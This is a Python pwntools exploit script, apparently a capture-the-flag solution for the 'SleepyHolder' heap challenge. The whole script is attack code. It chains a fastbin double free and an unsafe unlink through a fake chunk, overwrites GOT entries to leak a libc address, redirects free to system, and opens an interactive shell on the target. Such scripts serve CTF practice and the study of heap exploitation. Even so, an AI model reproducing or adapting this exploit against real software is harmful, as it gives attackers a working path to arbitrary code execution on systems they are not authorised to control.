Consolidate

#-*- coding: utf-8 -*-
#!/usr/bin/env python
from pwn import *
import binascii
import time
import sys
env = {'LD_PRELOAD' : "/lib/x86_64-linux-gnu/libc.so.6"}
 
 
 
 
#Env setting
debug = False
PIE = False
Remote = False
binary_path = "./SleepyHolder"
 
 
 
#binary and dll
elf = ELF(binary_path)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
 
 
context(log_level='debug')
context.binary = './SleepyHolder'
 
context.terminal = [ "tmux",'splitw', '-v', '-h', '-l', '90']
 
 
context.update(binary=elf)
 
 
if Remote == False:
    s = process("./SleepyHolder")
else:
    debug = False
    s = remote("server.com",1802)
 
main_malloc = 0x400DA2 
 
if debug :
    bp_list = [0x400BBE,0x400AEF,0x400C81]
    bp_str = get_bp_str(s,bp_list)
    print util.proc.pidof(s)
    gdb.attach(s,'''
    %s
    c''' % (bp_str))
 
 
 
    #TODO : hugeflag setting
global huge_flag
huge_flag = 0
 
def huge_alloc(index, content):
    s.recvuntil("3. Renew secret")
    s.send('1')
    s.recvuntil("2. Big secret")
    s.recvuntil("3. Keep a huge secret and lock it forever")
    s.send(str(index))
    s.recvuntil("Tell me your secret: ")
    s.send(content)
 
 
def alloc(index, content):
    s.recvuntil("3. Renew secret")
    s.send('1')
    s.recvuntil("2. Big secret")
    s.send(str(index))
    s.recvuntil("Tell me your secret: ")
    s.send(content)
 
def rewrite(index, content):
    s.recvuntil("3. Renew secret")
    s.send('3')
    s.recvuntil('2. Big secret')
    s.send(str(index))
    s.recvuntil("Tell me your secret: ")
    s.send(content)
 
 
def free(index):
    s.recvuntil("3. Renew secret")
    s.send('2')
    s.recvuntil("2. Big secret")
    s.send(str(index))
 
 
small = 0x6020d0
 
s.recvuntil("Waking Sleepy Holder up ...")
 
 
log.info("[*] fastbins allocation")
huge_alloc(1,p64(0x602018-0x10))  #fastbins
 
log.info("[*] smallbins allocation")
huge_alloc(2,"/bin/sh\x00") #smallbins to top chunk sparated
 
log.info("[*] 0 fastbins free")
free(1) #fastbins free
 
log.info("[*] larg bins alloc, fastbins to smallbins")
huge_alloc(3,"bbbbb") # large bins alloc, fastbins list bins move to unsortedbins
 
log.info('[*] double free bug fastbins')
free(1)
 
log.info('[*] alloc fastbins duplicate')
alloc(1,"1234")
 
#make fakechunk
#What is the gaol ?
payload = ""
payload += p64(0)
payload += p64(0x20)      #size
payload += p64(small-0x18)#fd
payload += p64(small-0x10)#bk
payload += p64(0x20)      #next chunk prev_size
payload += p64(0)
log.info('[*]make fake chunk')
rewrite(1,payload)
 
log.info('[*] trigger unsafe unlink exploit')
log.info('[*] we can put the fd_addr to global_address(small)')
free(2)
 
 
plt_puts = elf.plt['puts']
got_atoi = elf.got['atoi']
got_free = elf.got['free']
payload = ""
 
 
 
payload += p64(0)
payload += p64(got_atoi)
payload += p64(0)
payload += p64(got_free)
log.info('[*] To prepared, free got overwrit payload')
rewrite(1,payload)
 
log.info('[*] free got modify to puts plt')
log.info("[*] plt_puts %s"% hex(plt_puts))
rewrite(1,p64(plt_puts))
 
s.sendline('2') #free --> puts plt modify
print s.recvuntil("2. Big secret\n")
time.sleep(0.4)
s.sendline('2') #free(big_data_qword_6020C0) --> puts(got_atoi)
 
libc_atoi = u64(s.recv(6)+"\x00\x00")
#log.info('[*] libc atoi %x'%(atoi_libc))
 
 
libc_base = libc_atoi -libc.symbols['atoi']
 
libc_system = libc_base + libc.symbols['system']
 
rewrite(1,p64(libc_system)) #puts --> system func
alloc(2,'/bin/sh\x00') #read(0, big_data_qword_6020C0, 0xFA0uLL);
                   #big_data => /bin/sh\x00
 
 
s.sendline('2')        #free --> system(big_data)
s.sendline('2')           #free --> system(big_data)
 
 
 
 
 
 
 
s.interactive()